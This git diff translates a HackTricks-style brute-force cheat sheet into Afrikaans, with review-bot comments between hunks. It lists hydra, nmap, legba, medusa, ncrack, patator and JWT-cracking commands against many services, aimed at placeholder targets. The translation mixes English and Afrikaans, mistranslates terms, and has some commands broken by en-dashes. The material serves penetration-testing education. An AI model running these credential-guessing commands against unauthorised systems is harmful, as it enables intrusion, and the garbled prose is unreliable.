mirror of https://github.com/carlospolop/hacktricks (synced 2024-11-25 22:20:43 +00:00)
Translated ['generic-methodologies-and-resources/brute-force.md'] to af
parent 2a51736f49
commit 0465b30f28
1 changed files with 194 additions and 138 deletions
|
@ -14,17 +14,17 @@ Kry Toegang Vandag:
|
|||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat** Kyk na die [**INSKRYWINGSPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**Die PEASS Familie**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord groep**](https://discord.gg/hRep4RUj7f) of die [**telegram groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks\_live**](https://twitter.com/hacktricks\_live)**.**
|
||||
* **Deel jou haktruuks deur PRs in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* **Deel jou haktruuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
|
||||
## Standaard Gelde
|
||||
|
||||
**Soek in Google** vir die standaardgelde van die tegnologie wat gebruik word, of **probeer hierdie skakels**:
|
||||
**Soek in Google** vir die standaard gelde van die tegnologie wat gebruik word, of **probeer hierdie skakels**:
|
||||
|
||||
* [**https://github.com/ihebski/DefaultCreds-cheat-sheet**](https://github.com/ihebski/DefaultCreds-cheat-sheet)
|
||||
* [**http://www.phenoelit.org/dpl/dpl.html**](http://www.phenoelit.org/dpl/dpl.html)
|
||||
|
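Review bot: "Standaard Gelde" in the heading and "standaard gelde" in the sentence under it read as "default money" in Afrikaans, while the links that follow are default-credential databases (DefaultCreds-cheat-sheet and the like). The change only splits "standaardgelde" into two words and keeps the mistranslation; a term such as "verstek-aanmeldbesonderhede" would match the linked content, and the heading should change with it.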
@ -37,7 +37,7 @@ Ander maniere om HackTricks te ondersteun:
|
|||
* [**https://www.cirt.net/passwords**](https://www.cirt.net/passwords)
|
||||
* [**http://www.passwordsdatabase.com/**](http://www.passwordsdatabase.com)
|
||||
* [**https://many-passwords.github.io/**](https://many-passwords.github.io)
|
||||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||||
* [**https://theinfocentric.com/**](https://theinfocentric.com/)
|
||||
|
||||
## **Skep jou eie Woordeboeke**
|
||||
|
||||
|
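Review bot: the theinfocentric.com list item appears as both the removed and the added line with identical visible text, so this hunk is a whitespace-only change (trailing space or line ending). Drop it from the commit, or normalise whitespace in a separate change, so the translation diff stays reviewable.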
@ -56,7 +56,7 @@ crunch 6 8 -t ,@@^^%%
|
|||
```
|
||||
### Cewl
|
||||
|
||||
Cewl is 'n hulpmiddel wat gebruik word om woorde uit 'n webwerf te onttrek en 'n woordelys te skep vir aanvalle met krag. Dit kan help om doelwitsleutels te identifiseer vir aanvalle met krag.
|
||||
Cewl is 'n hulpmiddel wat gebruik word om woorde uit 'n webwerf te onttrek en 'n woordelys te skep vir aanvalle met geweld. Dit kan help om doelwitspesifieke woorde te identifiseer vir aanvalle met geweld soos woordelysaanvalle.
|
||||
```bash
|
||||
cewl example.com -m 5 -w words.txt
|
||||
```
|
||||
|
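Review bot: the Cewl description now renders brute force as "aanvalle met geweld" (attacks with violence), while other sections of this same file use "brute force-aanvalle" and "bruto-kragaanvalle". Pick one rendering for the whole file; leaving "brute force" untranslated, as the section headings already do, keeps the term searchable.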
@ -68,7 +68,7 @@ python3 cupp.py -h
|
|||
```
|
||||
### [Wister](https://github.com/cycurity/wister)
|
||||
|
||||
'n Woordelys generator instrument, wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegee woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
|
||||
'n Woordelys-generatorwerktuig, wat jou toelaat om 'n stel woorde te voorsien, wat jou die moontlikheid gee om verskeie variasies van die gegewe woorde te skep, 'n unieke en ideale woordelys te skep om te gebruik met betrekking tot 'n spesifieke teiken.
|
||||
```bash
|
||||
python3 wister.py -w jane doe 2022 summer madrid 1998 -c 1 2 3 4 5 -o wordlist.lst
|
||||
|
||||
|
@ -105,14 +105,14 @@ Finished in 0.920s.
|
|||
<figure><img src="../.gitbook/assets/image (45).png" alt=""><figcaption></figcaption></figure>
|
||||
|
||||
\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik en **outomatiese werksvloei** te bou met behulp van die wêreld se **mees gevorderde** gemeenskapsinstrumente.\
|
||||
Gebruik [**Trickest**](https://trickest.com/?utm\_campaign=hacktrics\&utm\_medium=banner\&utm\_source=hacktricks) om maklik te bou en **outomatiseer werksvloei** aangedryf deur die wêreld se **mees gevorderde** gemeenskaplike gereedskap.\
|
||||
Kry Vandaag Toegang:
|
||||
|
||||
{% embed url="https://trickest.com/?utm_campaign=hacktrics&utm_medium=banner&utm_source=hacktricks" %}
|
||||
|
||||
## Dienste
|
||||
|
||||
Gelys in alfabetiese volgorde volgens diensnaam.
|
||||
Gesorteer alfabeties volgens diensnaam.
|
||||
|
||||
### AFP
|
||||
```bash
|
||||
|
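Review bot: the banner's call to action is spelled "Kry Vandaag Toegang:" in this hunk, but the first hunk's header context shows the same banner as "Kry Toegang Vandag:"; "Vandaag" is the Dutch spelling. The rewritten Trickest sentence also no longer parses ("om maklik te bou en **outomatiseer werksvloei** aangedryf deur ..."); rephrase it as a single clause or keep the removed wording.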
@ -126,13 +126,7 @@ msf> run
|
|||
```
|
||||
### AJP
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against the AJP protocol can be carried out using tools like Hydra or Burp Suite Intruder. These tools can be used to guess usernames and passwords by systematically trying all possible combinations until the correct one is found.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks on the AJP protocol, it is recommended to implement strong password policies, enable account lockout mechanisms after a certain number of failed login attempts, and use multi-factor authentication where possible. Additionally, monitoring and logging login attempts can help in detecting and mitigating such attacks.
|
||||
AJP (Apache JServ Protocol) is a binary protocol that can be brute-forced to gain unauthorized access. It is commonly used to connect web servers and servlet containers.
|
||||
```bash
|
||||
nmap --script ajp-brute -p 8009 <IP>
|
||||
```
|
||||
|
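Review bot: the paragraph added under "### AJP" is English ("AJP (Apache JServ Protocol) is a binary protocol ..."), in a commit whose stated purpose is translating this file to af. It also replaces the "#### Protection" paragraph without carrying any of it over. Translate the new sentence and keep the lockout and logging guidance, or drop the prose and let the nmap ajp-brute command stand as the section's content.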
@ -142,7 +136,7 @@ legba amqp --target localhost:5672 --username admin --password data/passwords.tx
|
|||
```
|
||||
### Cassandra
|
||||
|
||||
Brute-force attacks against Cassandra can be carried out using a variety of tools such as Hydra, Ncrack, and Metasploit. These tools can be used to guess passwords and gain unauthorized access to the database. It is important to use strong and complex passwords, implement account lockout policies, and monitor for any suspicious activity to protect against brute-force attacks.
|
||||
Brute-force attacks against Cassandra databases are typically carried out by trying common usernames and passwords or by using password lists. These attacks can be automated using tools like Hydra or Medusa. It is important to ensure that strong authentication mechanisms are in place to prevent successful brute-force attacks.
|
||||
```bash
|
||||
nmap --script cassandra-brute -p 9160 <IP>
|
||||
# legba ScyllaDB / Apache Casandra
|
||||
|
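Review bot: the new Cassandra paragraph names Hydra or Medusa, but the commands directly below it use nmap's cassandra-brute script and legba scylla. Name the tools the section actually shows, or leave tool names out of the prose.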
@ -150,7 +144,19 @@ legba scylla --username cassandra --password wordlists/passwords.txt --target lo
|
|||
```
|
||||
### CouchDB
|
||||
|
||||
Brute-force attacks against CouchDB are relatively simple to execute. The most common method is to use a tool like Hydra to repeatedly try different username and password combinations until the correct one is found. This can be effective if weak credentials are used. It is important to note that brute-forcing is illegal and unethical unless you have explicit permission to test the security of a CouchDB instance.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to gain unauthorized access to a CouchDB instance by repeatedly trying different passwords until the correct one is discovered.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks on CouchDB, it is recommended to:
|
||||
|
||||
1. Implement strong password policies.
|
||||
2. Limit the number of login attempts.
|
||||
3. Use multi-factor authentication.
|
||||
4. Monitor login attempts for suspicious activity.
|
||||
5. Consider implementing account lockout mechanisms after multiple failed login attempts.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/couchdb/couchdb_login
|
||||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 5984 http-get /
|
||||
|
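Review bot: in the "#### Protection" list added under CouchDB, item 2 ("Limit the number of login attempts") and item 5 ("Consider implementing account lockout mechanisms after multiple failed login attempts") describe the same control. Merge them into one item so the list has four distinct controls.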
@ -163,21 +169,7 @@ hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/word
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to crack passwords or encryption keys. In the context of Elasticsearch, brute force attacks can be attempted against the authentication mechanisms to gain unauthorized access to the system.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks in Elasticsearch, consider implementing the following measures:
|
||||
|
||||
1. **Strong Passwords**: Encourage users to use complex and unique passwords to make it harder for attackers to guess.
|
||||
|
||||
2. **Account Lockout**: Implement account lockout policies that lock user accounts after a certain number of failed login attempts.
|
||||
|
||||
3. **Rate Limiting**: Configure rate limiting to restrict the number of login attempts from a single source within a specific time frame.
|
||||
|
||||
4. **Multi-Factor Authentication (MFA)**: Enforce MFA to add an extra layer of security to the authentication process.
|
||||
|
||||
By implementing these protection measures, you can significantly reduce the risk of unauthorized access through brute force attacks.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is commonly used to crack passwords and gain unauthorized access to systems or accounts. In the context of Elasticsearch, brute force attacks can be used to guess the credentials of the Elasticsearch cluster and gain access to sensitive data. It is important to implement strong password policies and other security measures to protect against brute force attacks.
|
||||
```
|
||||
hydra -L /usr/share/brutex/wordlists/simple-users.txt -P /usr/share/brutex/wordlists/password.lst localhost -s 9200 http-get /
|
||||
```
|
||||
|
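Review bot: the replacement Elasticsearch paragraph describes "trying all possible combinations of a password", but the hydra command under it is driven by -L and -P wordlists, which is a dictionary attack rather than an exhaustive search. It also collapses the removed four-item list (strong passwords, account lockout, rate limiting, MFA) into "strong password policies and other security measures". Keep the named controls and describe the attack as wordlist-based.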
@ -222,11 +214,25 @@ cmsmap -f W/J/D/M -u a -p a https://wordpress.com
|
|||
```
|
||||
### IMAP
|
||||
|
||||
#### Brute Force
|
||||
IMAP (Internet Message Access Protocol) is a standard email protocol that stores email messages on a mail server. It allows the end user to view and manipulate the messages as though they were stored locally on the end user's device.
|
||||
|
||||
Brute force attacks against IMAP are typically carried out using tools such as Hydra or Nmap. These tools allow an attacker to systematically check all possible usernames and passwords until the correct combination is found.
|
||||
### Brute Force Attack
|
||||
|
||||
To protect against brute force attacks, it is recommended to implement account lockout policies, strong password requirements, and multi-factor authentication. Additionally, monitoring login attempts for unusual patterns can help detect and mitigate brute force attacks.
|
||||
#### Description
|
||||
|
||||
A brute force attack is a trial-and-error method used to obtain information such as a user password or personal identification number (PIN). In a brute force attack, automated software is used to generate a large number of consecutive guesses as to the value of the desired data.
|
||||
|
||||
#### Tools
|
||||
|
||||
- Hydra
|
||||
- Medusa
|
||||
- Ncrack
|
||||
|
||||
#### Countermeasures
|
||||
|
||||
- Implement account lockout policies
|
||||
- Use complex and unique passwords
|
||||
- Implement multi-factor authentication
|
||||
```bash
|
||||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> imap -V
|
||||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 993 -f <IP> imap -V
|
||||
|
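Review bot: "### Brute Force Attack" is added at heading level 3 directly under "### IMAP", so it becomes a sibling of the service entries in a list the page says is sorted alphabetically by service name. Other sections touched by this commit use "#### Brute Force" for the same purpose; use level 4 here as well, and demote or fold the "#### Description", "#### Tools" and "#### Countermeasures" headings beneath it.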
@ -235,7 +241,21 @@ legba imap --username user --password data/passwords.txt --target localhost:993
|
|||
```
|
||||
### IRC
|
||||
|
||||
IRC (Internet Relay Chat) is 'n protokol wat gebruik word vir real-time teksgesprekke oor die internet. Dit is 'n gewilde platform vir kommunikasie en same-werking tussen gebruikers regoor die wêreld.
|
||||
#### Brute Force
|
||||
|
||||
Brute force is a common technique used to gain unauthorized access to IRC channels. Attackers use automated tools to try a large number of username and password combinations until they find the correct one. This method is effective against weak or easily guessable passwords. It is important for IRC users to use strong and unique passwords to protect their accounts from brute force attacks.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To mitigate brute force attacks on IRC channels, users should follow these best practices:
|
||||
|
||||
- **Use Strong Passwords:** Create passwords that are long, complex, and unique.
|
||||
- **Enable Account Lockout:** Implement account lockout policies to lock accounts after a certain number of failed login attempts.
|
||||
- **Monitor Login Attempts:** Keep track of login attempts and investigate any suspicious activity.
|
||||
- **Use Two-Factor Authentication:** Enable two-factor authentication for an extra layer of security.
|
||||
- **Regularly Update Passwords:** Change passwords regularly to reduce the risk of brute force attacks.
|
||||
|
||||
By following these mitigation techniques, IRC users can enhance the security of their accounts and protect themselves from brute force attacks.
|
||||
```bash
|
||||
nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,passdb=/path/pass.txt -p <PORT> <IP>
|
||||
```
|
||||
|
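Review bot: the one Afrikaans sentence describing IRC is replaced by English "#### Brute Force" and "#### Mitigation" sections, which moves the file away from the target language. The new text also speaks of access to "IRC channels", while the nmap scripts in the command below (irc-brute, irc-sasl-brute) audit server and SASL authentication. Keep the Afrikaans description and translate whatever new prose stays.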
@ -243,13 +263,19 @@ nmap -sV --script irc-brute,irc-sasl-brute --script-args userdb=/path/users.txt,
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against iSCSI targets involve attempting to guess the target's CHAP (Challenge-Handshake Authentication Protocol) credentials by trying all possible combinations of usernames and passwords. This is a common method used to gain unauthorized access to iSCSI storage resources. It is essential to use strong and unique credentials to protect against brute force attacks.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to crack weak passwords or gain unauthorized access to systems. It is important to use strong, complex passwords to protect against brute force attacks.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force-aanvalle behels om alle moontlike kombinasies van 'n wagwoord te probeer totdat die regte een gevind word. Hierdie metode kan gebruik word om swak wagwoorde te kraak of ongemagtigde toegang tot stelsels te verkry. Dit is belangrik om sterk, komplekse wagwoorde te gebruik om teen brute force-aanvalle te beskerm.
|
||||
```bash
|
||||
nmap -sV --script iscsi-brute --script-args userdb=/var/usernames.txt,passdb=/var/passwords.txt -p 3260 <IP>
|
||||
```
|
||||
### JWT
|
||||
|
||||
JWT (JSON Web Tokens) is 'n open standaard (RFC 7519) wat 'n kompak, self-inhoudende manier bied om inligting tussen partye as 'n JSON-voorwerp oor te dra. Hierdie inligting kan geverifieer en vertrou word omdat dit digitaal onderteken is. JWT's kan gebruik word vir verifikasie en uitruil van inligting tussen partye.
|
||||
### JWT
|
||||
```bash
|
||||
#hashcat
|
||||
hashcat -m 16500 -a 0 jwt.txt .\wordlists\rockyou.txt
|
||||
|
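Review bot: the literal heading "#### Afrikaans Translation", followed by a second "#### Brute Force", is translator scaffolding that ends up in the rendered page, leaving the iSCSI section with an English paragraph and its Afrikaans copy one after the other. Keep only the Afrikaans paragraph under a single heading, and carry over the CHAP detail from the removed iSCSI sentence, which the generic replacement loses. Further down, the Afrikaans JWT description appears to be replaced by a second "### JWT" line, so the heading shows twice.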
@ -274,21 +300,19 @@ jwt-cracker "eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJzdWIiOiIxMjM0NTY3ODkwIiwibm
|
|||
```
|
||||
### LDAP
|
||||
|
||||
LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om inligting uit 'n gidsdiens te onttrek of daarin te plaas. Dit kan gebruik word vir die uitvoering van aanvalle soos woordeboekaanvalle en bruto-kragaanvalle om toegang tot die gidsdiens te verkry.
|
||||
LDAP (Lightweight Directory Access Protocol) is 'n protokol wat gebruik word om inligting uit 'n gidsdiens te onttrek of daarin te plaas. Dit kan gebruik word vir die uitvoering van aanvalle soos woordeboekaanvalle of bruto-kragaanvalle om toegang tot die gidsdiens te verkry.
|
||||
```bash
|
||||
nmap --script ldap-brute -p 389 <IP>
|
||||
legba ldap --target 127.0.0.1:389 --username admin --password @wordlists/passwords.txt --ldap-domain example.org --single-match
|
||||
```
|
||||
### MQTT
|
||||
|
||||
MQTT (Message Queuing Telemetry Transport) is 'n ligte boodskap protokol wat ontwerp is vir klein toestelle met beperkte vermoëns en bandwydte. MQTT gebruik 'n "publish-subscribe" boodskap uitruil patroon om boodskappe tussen kliënte en bedieners te stuur.
|
||||
MQTT (Message Queuing Telemetry Transport) is 'n ligte boodskap protokol wat ontwerp is vir klein toestelle met beperkte verwerking en bandwydte hulpbronne. MQTT word dikwels gebruik vir die kommunikasie tussen toestelle in die Internet of Things (IoT) konteks.
|
||||
```
|
||||
ncrack mqtt://127.0.0.1 --user test –P /root/Desktop/pass.txt -v
|
||||
legba mqtt --target 127.0.0.1:1883 --username admin --password wordlists/passwords.txt
|
||||
```
|
||||
### Mongo
|
||||
|
||||
Brute force attacks against MongoDB databases are common due to the default configuration allowing unauthenticated access. Attackers can use tools like Hydra or custom scripts to attempt to guess usernames and passwords. It is crucial to secure MongoDB instances by setting strong passwords, enabling authentication, and restricting access to trusted IP addresses.
|
||||
```bash
|
||||
nmap -sV --script mongodb-brute -n -p 27017 <IP>
|
||||
use auxiliary/scanner/mongodb/mongodb_login
|
||||
|
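Review bot: the paragraph added under "### Mongo" is English and asserts that the default configuration allows unauthenticated access, with no version or source given; nothing else in this hunk supports it. Translate the paragraph and qualify or drop that claim.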
@ -296,7 +320,9 @@ legba mongodb --target localhost:27017 --username root --password data/passwords
|
|||
```
|
||||
### MSSQL
|
||||
|
||||
Brute-force attacks against MSSQL servers are typically performed using tools such as Hydra, Ncrack, or Metasploit. These tools allow an attacker to systematically try different username and password combinations until the correct one is found. It is important to note that brute-force attacks can be detected and blocked by implementing account lockout policies or using intrusion detection systems.
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to MSSQL databases. Attackers use automated tools to systematically try different combinations at a rapid pace until they find the right credentials. It is essential to have strong and unique passwords to mitigate the risk of a successful brute force attack.
|
||||
```bash
|
||||
legba mssql --username SA --password wordlists/passwords.txt --target localhost:1433
|
||||
```
|
||||
|
@ -304,7 +330,17 @@ legba mssql --username SA --password wordlists/passwords.txt --target localhost:
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to MySQL databases. Attackers use automated tools to systematically try different combinations until they find the right credentials. To protect against brute force attacks, it is essential to use strong and unique passwords, implement account lockout policies, and monitor for multiple failed login attempts.
|
||||
Brute force attacks involve systematically checking all possible keys or passwords until the correct one is found. This method can be used to crack MySQL user passwords by trying all possible combinations until the correct one is discovered.
|
||||
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks in MySQL, consider implementing the following measures:
|
||||
|
||||
1. **Strong Passwords**: Encourage users to use strong, complex passwords that are difficult to guess.
|
||||
2. **Account Lockout**: Implement account lockout policies that lock out users after a certain number of failed login attempts.
|
||||
3. **Rate Limiting**: Use rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication**: Implement multi-factor authentication to add an extra layer of security to user accounts.
|
||||
5. **Monitoring**: Regularly monitor MySQL logs for any suspicious login activities and investigate them promptly.
|
||||
```bash
|
||||
# hydra
|
||||
hydra -L usernames.txt -P pass.txt <IP> mysql
|
||||
|
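Review bot: the "#### Protection" list added under MySQL covers the same controls, in nearly the same words, as the lists this commit adds under CouchDB and PostgreSQL (strong passwords, account lockout, rate limiting, MFA, monitoring), and it is in English. Repeating it per service adds length without service-specific guidance; put it once in a shared section, translated, and keep each service section to its commands.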
@ -320,20 +356,7 @@ legba mysql --username root --password wordlists/passwords.txt --target localhos
|
|||
```
|
||||
### OracleSQL
|
||||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be effective but is time-consuming and resource-intensive. It is important to use strong and complex passwords to mitigate the risk of a successful brute force attack.
|
||||
|
||||
#### Brute Force Protection
|
||||
|
||||
To protect against brute force attacks, consider implementing the following measures:
|
||||
|
||||
1. **Account Lockout**: Implement account lockout policies that lock an account after a certain number of failed login attempts.
|
||||
2. **CAPTCHA**: Use CAPTCHA challenges to differentiate between human users and automated bots.
|
||||
3. **Rate Limiting**: Implement rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication (MFA)**: Require users to provide additional verification, such as a code sent to their mobile device, in addition to their password.
|
||||
|
||||
By implementing these measures, you can significantly reduce the risk of a successful brute force attack on your OracleSQL database.
|
||||
Brute-force attacks against OracleSQL databases are typically performed using tools such as Hydra or Metasploit. These tools allow attackers to systematically try all possible combinations of usernames and passwords until the correct one is found. It is important to note that brute-force attacks can be time-consuming and resource-intensive, so they should be used as a last resort when other methods of gaining access to the database have been exhausted.
|
||||
```bash
|
||||
patator oracle_login sid=<SID> host=<IP> user=FILE0 password=FILE1 0=users-oracle.txt 1=pass-oracle.txt -x ignore:code=ORA-01017
|
||||
|
||||
|
@ -361,7 +384,7 @@ Om **oracle\_login** met **patator** te gebruik, moet jy dit **installeer**:
|
|||
```bash
|
||||
pip3 install cx_Oracle --upgrade
|
||||
```
|
||||
[Aflyn OracleSQL-hash-bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**):
|
||||
[Aflyn OracleSQL-hash bruteforce](https://github.com/carlospolop/hacktricks/blob/master/network-services-pentesting/1521-1522-1529-pentesting-oracle-listener/remote-stealth-pass-brute-force.md#outer-perimeter-remote-stealth-pass-brute-force) (**weergawes 11.1.0.6, 11.1.0.7, 11.2.0.1, 11.2.0.2,** en **11.2.0.3**):
|
||||
```bash
|
||||
nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid=DB11g -n 10.11.21.30
|
||||
```
|
||||
|
@ -369,13 +392,7 @@ nmap -p1521 --script oracle-brute-stealth --script-args oracle-brute-stealth.sid
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks are one of the simplest and most common hacking techniques. In a brute force attack, the hacker uses automated tools to try all possible combinations of usernames and passwords until the correct one is found. This method is time-consuming but can be effective, especially if the passwords are weak.
|
||||
|
||||
#### Afrikaans Translation
|
||||
|
||||
#### Geweldenaanval
|
||||
|
||||
Geweldenaanvalle is een van die eenvoudigste en mees algemene hakmetodes. In 'n geweldenaanval gebruik die hacker outomatiese gereedskap om alle moontlike kombinasies van gebruikersname en wagwoorde te probeer totdat die regte een gevind word. Hierdie metode is tydrowend maar kan effektief wees, veral as die wagwoorde swak is.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method is time-consuming but can be effective, especially if the password is weak. Tools like Hydra and Medusa can automate the process of brute-forcing passwords. It is important to note that brute force attacks can be detected and prevented by implementing measures such as account lockouts after multiple failed login attempts.
|
||||
```bash
|
||||
hydra -l USERNAME -P /path/to/passwords.txt -f <IP> pop3 -V
|
||||
hydra -S -v -l USERNAME -P /path/to/passwords.txt -s 995 -f <IP> pop3 -V
|
||||
|
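Review bot: this hunk removes the Afrikaans paragraph ("Geweldenaanvalle is een van die eenvoudigste ...") together with the stray "#### Afrikaans Translation" heading and leaves only an English paragraph above the pop3 commands. Dropping the scaffolding heading is right, but the Afrikaans text is what a translation commit should keep; the iSCSI hunk in this same commit does the opposite and adds such a heading.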
@ -390,23 +407,18 @@ legba pop3 --username admin@example.com --password wordlists/passwords.txt --tar
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be effective but is time-consuming and resource-intensive. It is important to use strong, complex passwords to mitigate the risk of a successful brute force attack.
|
||||
Brute force attacks involve trying all possible combinations of a password until the correct one is found. This method can be used to gain unauthorized access to a PostgreSQL database by repeatedly trying different passwords.
|
||||
|
||||
#### Brute Force Protection
|
||||
#### Protection
|
||||
|
||||
To protect against brute force attacks, consider implementing the following measures:
|
||||
To protect against brute force attacks in PostgreSQL, you can implement the following measures:
|
||||
|
||||
1. **Lockout Policy:** Implement a lockout policy that locks out users after a certain number of failed login attempts. This can help prevent attackers from continuously trying different passwords.
|
||||
1. **Strong Passwords**: Encourage users to use strong, complex passwords that are difficult to guess.
|
||||
2. **Account Lockout**: Implement account lockout policies that lock an account after a certain number of failed login attempts.
|
||||
3. **Rate Limiting**: Implement rate limiting to restrict the number of login attempts within a specific time frame.
|
||||
4. **Multi-Factor Authentication (MFA)**: Enforce the use of MFA to add an extra layer of security to the authentication process.
|
||||
|
||||
2. **Account Lockout Duration:** Specify a duration for which an account remains locked after multiple failed login attempts. This can deter attackers from targeting the same account repeatedly.
|
||||
|
||||
3. **Complex Password Requirements:** Enforce complex password requirements such as minimum length, special characters, and a mix of uppercase and lowercase letters. This can make it harder for attackers to guess passwords through brute force.
|
||||
|
||||
4. **Multi-Factor Authentication (MFA):** Implement MFA to add an extra layer of security beyond passwords. This can help mitigate the risk of unauthorized access even if passwords are compromised.
|
||||
|
||||
5. **Monitoring and Alerts:** Set up monitoring and alerts for suspicious login activities, such as multiple failed login attempts within a short period. This can help detect and respond to brute force attacks in real-time.
|
||||
|
||||
By implementing these measures, you can enhance the security of your PostgreSQL database and reduce the risk of unauthorized access through brute force attacks.
|
||||
By implementing these protection measures, you can significantly reduce the risk of a successful brute force attack on your PostgreSQL database.
|
||||
```bash
|
||||
hydra -L /root/Desktop/user.txt –P /root/Desktop/pass.txt <IP> postgres
|
||||
medusa -h <IP> –U /root/Desktop/user.txt –P /root/Desktop/pass.txt –M postgres
|
||||
|
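Review bot: the hydra and medusa lines at the end of this hunk use an en dash in "–P", "–U" and "–M" instead of an ASCII hyphen, so the options are not parsed as flags when the commands are copied. They are unchanged context here, but the commit already touches this section, so fix them in the same pass. The new "#### Protection" list also drops the monitoring-and-alerts item that the removed list had.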
@ -427,7 +439,16 @@ cat rockyou.txt | thc-pptp-bruter –u <Username> <IP>
|
|||
|
||||
#### Brute Force
|
||||
|
||||
Brute force attacks against RDP servers are common and can be successful if proper security measures are not in place. Attackers use automated tools to try a large number of username and password combinations until they find the correct one. This can be mitigated by implementing account lockout policies, using complex passwords, and enabling Network Level Authentication (NLA) where possible.
|
||||
Brute force attacks involve trying all possible combinations of usernames and passwords until the correct one is found. This method is commonly used to gain unauthorized access to RDP servers. Attackers can use automated tools to rapidly try different combinations, making it a popular choice for hacking.
|
||||
|
||||
#### Mitigation
|
||||
|
||||
To protect against brute force attacks on RDP, it is recommended to:
|
||||
- Use complex and unique passwords
|
||||
- Implement account lockout policies
|
||||
- Use multi-factor authentication
|
||||
- Limit the number of login attempts
|
||||
- Monitor and log RDP login activity
|
||||
```bash
|
||||
ncrack -vv --user <User> -P pwds.txt rdp://<IP>
|
||||
hydra -V -f -L <userslist> -P <passwlist> rdp://<IP>
|
||||
|
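Review bot: the removed RDP paragraph named Network Level Authentication (NLA); the new "#### Mitigation" list has only generic items and no longer mentions it. Add NLA back as a list item, since it is the one RDP-specific control the section had.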
@ -435,7 +456,7 @@ legba rdp --target localhost:3389 --username admin --password data/passwords.txt
|
|||
```
|
||||
### Redis
|
||||
|
||||
Redis is 'n in-memory data store wat dikwels gebruik word vir caching en sessiebeheer in webtoepassings. Dit kan ook gebruik word as 'n databasis vir klein tot medium projekte. Redis is bekend vir sy vinnige lees- en skryfoperasies, wat dit 'n gewilde keuse maak vir situasies waar spoed 'n prioriteit is.
|
||||
Redis is 'n in-memory data store wat dikwels gebruik word vir caching en sessiebeheer in webtoepassings. Dit kan ook gebruik word vir die hantering van boodskappe in 'n boodskapgeorkestreerde stelsel. Redis is bekend vir sy vinnige lees- en skryfoperasies, wat dit 'n gewilde keuse maak vir situasies waar spoed 'n prioriteit is.
|
||||
```bash
|
||||
msf> use auxiliary/scanner/redis/redis_login
|
||||
nmap --script redis-brute -p 6379 <IP>
|
||||
|
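Review bot: "boodskapgeorkestreerde stelsel" in the new Redis sentence is not an established term and reads as a word-for-word rendering; if the intent is message-broker or publish/subscribe use, say that directly. The sentence it replaces ("as 'n databasis vir klein tot medium projekte") was clear.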
@ -444,19 +465,33 @@ legba redis --target localhost:6379 --username admin --password data/passwords.t
|
|||
```
|
||||
### Rexec
|
||||
|
||||
Rexec is a simple service that allows users to execute commands on a remote system. It is often used during penetration testing to brute force credentials or execute commands on a compromised system.
|
||||
#### Brute Force
|
||||
|
